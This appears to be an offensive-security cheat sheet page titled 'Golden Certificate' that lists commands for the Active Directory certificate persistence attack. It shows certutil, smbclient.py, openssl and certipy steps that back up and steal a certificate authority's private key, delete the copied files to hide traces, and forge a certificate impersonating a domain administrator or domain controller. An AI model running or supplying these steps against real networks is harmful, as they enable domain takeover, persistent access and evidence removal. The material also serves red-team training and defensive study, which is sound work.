Golden Certificate

THEFT3 + DPERSIST1

Backup and extract manually:

Cmd > certutil.exe -backupkey -f -p Passw0rd! C:\Windows\CABackup
$ smbclient.py -k -no-pass CA01.megacorp.local
# use c$
# cd windows/CABackup
# get CorpCA.p12
# rm CorpCA.p12
# cd ..
# rmdir CABackup

P12 to PFX:

$ certipy cert -pfx CorpCA.p12 -password 'Passw0rd!' -export -out CorpCA.pfx

Get CRL from the DC:

$ </dev/null openssl s_client -connect <DC_IP>:636 | openssl x509 > dc.crt

Certipy

$ certipy ca -backup -ca CorpCA -k -no-pass -target CA01.megacorp.local -dc-ip 192.168.1.11 -ns 192.168.1.11
$ certipy forge -ca-pfx CorpCA.pfx -upn '[email protected]' (or -dns DC01.megacorp.local) -subject 'CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local' -sid <DC01_SID> -crl 'ldap:///***'

Last updated 1 month ago

hashtagCertipy

Certipy